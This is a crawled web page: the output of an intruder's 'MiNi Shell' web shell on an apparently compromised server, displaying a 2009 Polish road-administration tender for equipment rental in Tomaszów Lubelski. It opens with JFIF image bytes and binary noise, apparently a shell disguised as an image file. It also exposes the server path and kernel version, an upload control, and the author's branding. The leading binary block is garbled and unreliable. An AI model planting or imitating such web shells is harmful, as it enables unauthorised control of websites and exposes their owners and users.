JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090127/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090127/9726-N-2009.html

<p class="kh_header"><b>Tomaszów Lubelski: Wynajem sprzętu</b><br>
<b>Numer ogłoszenia: 9726 - 2009; data zamieszczenia: 27.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych , ul. Lwowska 54, 22-600 Tomaszów Lubelski, woj. lubelskie, tel. 084 6643045, faks 084 6642273.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.zdptomaszow.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wynajem sprzętu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wynajem sprzętu do wykonawstwa remontów cząstkowych siłami własnymi ZDP ( walec, samochód ciężarowy z przyczepą, ładowarka, oraz skrapiarka samojezdna i walec drogowy).</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 60.18.10.00-0, 45.50.00.00-2, 45.52.00.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie pobiera się<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy potwierdzający 
    spełnienie warunków:  1.1)   posiadają uprawnienia do wykonywania określonej działalności lub czynności, 
         jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
1.2)   posiadają niezbędną wiedzę i doświadczenie oraz potencjał techniczny, a także
   dysponują osobami zdolnymi do wykonania zamówienia,
1.3)   znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie 
  zamówienia,
1.4)   nie podlegają wykluczeniu z postępowania o udzielenie zamówienia 
         publicznego,
1.5)   zaakceptują terminy płatności :  - do 30 dni od daty złożenia rachunku,
1.6)   wykażą niezbędne do wykonania zamówienia narzędzia i urządzenia jakie 
         posiada Wykonawca (w zależności od wyboru zadania - zgodnie z pkt. od 6.5 
         do 6.8),
2. Z ubiegania się o zamówienia publicznego wyklucza się wykonawców, 
    którzy:  2.1) nie spełniają warunków udziału w postępowaniu o zamówienie publiczne z
       art. 22 Prawa zamówień publicznych opisanych w ppkt. 1.1) do 1.4) 2.2) podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 Prawa 
      zamówień publicznych. 2.3) wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego 
       postępowania, lub posługiwali się w celu sporządzenia oferty osobami 
       uczestniczącymi w dokonywaniu tych czynności chyba, że udział tych 
       wykonawców w postępowaniu nie utrudnia uczciwej konkurencji. 
2.4) złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego 
       postępowania.  2.5) nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub 
       dokumentów potwierdzających spełnianie tych warunków z zastrzeżeniem 
       art.26 ust. 3 Prawa zamówień publicznych.
3. Zamawiający odrzuca ofertę, jeżeli:  3.1) jest niezgodną z ustawą lub jej treść nie odpowiada treści specyfikacji istotnych 
       warunków zamówienia,  3.2) jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o 
       zwalczaniu nieuczciwej konkurencji  3.3) zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia,
3.4) została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o 
       udzielenie zamówienia lub niezaproszonego do składania ofert,  3.5) zawiera omyłki rachunkowe w obliczeniu ceny, których nie można poprawić na 
       podstawie art. 88 Prawa zamówień publicznych, lub błędy w obliczeniu ceny, 3.6) wykonawca w terminie 7 dni od dnia otrzymania zawiadomienia nie zgodził się 
       na poprawienie omyłki rachunkowej w obliczeniu ceny,  3.7) jest nieważna na podstawie odrębnych przepisów,   4. Ofertę wykonawcy wykluczonego uznaje się za odrzuconą.  5. Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w 
    oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu 
    metodą warunku granicznego - spełnia/niespełna..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> A. Na ofertę składają się następujące dokumenty i załączniki:  A.1)   formularz oferty ( na załączonym druku nr 1 ) ;
A.2)   kosztorys ofertowy ( na załączonym druku nr 2 ) ;
A.3)   wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń -  
          posiadany sprzęt  (na załączonym druku nr 3) ;
A.4)   zaakceptowany formularz umowy ( druk nr 4) ;
A.5)   oświadczenie o spełnieniu warunków określonych przepisami art. 22 ust. 1
          ustawy o zam. publicznych ( na załączonym druku nr 5) ;

B. Dokumenty wymagane w przypadku składania oferty wspólnej:   B.1) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim 
      przypadku dla ustanowionego pełnomocnika do oferty należy załączyć 
      pełnomocnictwo do reprezentowania w postępowaniu lub do reprezentowania w 
      postępowaniu i zawarcia umowy.  Oferta winna zawierać: oświadczenia i dokumenty opisane w pkt. VI dla każdego partnera z osobna, pozostałe dokumenty składane są wspólnie.
C. Postanowienia dotyczące składanych dokumentów.  C.1) Wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub 
        kserokopii potwierdzonych za zgodność przez Wykonawcę lub osobę / osoby 
        uprawnione do podpisania oferty z dopiskiem za zgodność z oryginałem.  C.2) Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na 
        język polski, poświadczonym przez wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.zdptomaszow.pl/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ZARZĄD DRÓG POWIATOWYCH
ul. LWOWSKA 54   ;   22-600 TOMASZÓW LUB.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.02.2009 godzina 12:00, miejsce: ZARZĄD DRÓG POWIATOWYCH
ul. LWOWSKA 54   ;   22-600 TOMASZÓW LUB.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> wynajem walca ogumionego lub stalowego.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> wynajem walca ogumionego lub stalowego min. 4,0 tony wraz  z obsługą - Obwód Drogowy Lubycza Królewska - 150 godz./m-c.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.50.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> wynajem samochodu z przyczepą do przewozu materiałów 	kamiennych;.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> wynajem samochodu z przyczepą do przewozu materiałów kamiennych; zestaw niski do wys. 1,2 mb - wraz z obsługą do 	remontów dróg - Obwód Drogowy Lubycza Królewska - 150 godz. /m-c.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.18.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> wynajem ładowarki o poj. Łyżki do 1 m3 -2 m3  do załadunku 	remontera  i samochodu  z przyczepą -.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> wynajem ładowarki o poj. Łyżki do 1 m3 -2 m3  do załadunku 	remontera  i samochodu  z przyczepą - wraz z obsługą - Obwód Drogowy 	Lubycza Królewska - 40 godz. /m-c.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.52.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> wynajem skrapiarki samojezdnej o pojemności min 2000 dm3 - wraz z obsługą - Obwód Drogowy w Lubyczy Królewskiej.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> wynajem skrapiarki samojezdnej o pojemności min 2000 dm3 - wraz z obsługą - Obwód Drogowy w Lubyczy Królewskiej-150 godz. /m-c.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.50.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> wynajem walca drogowego do skrapiarki min. 4,0 tony, wraz z obsługą - Obwód Drogowy w Lubyczy Królewskiej.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> wynajem walca drogowego do skrapiarki min. 4,0 tony, wraz z obsługą - Obwód Drogowy w Lubyczy Królewskiej - 150 godz./m-c.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.50.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com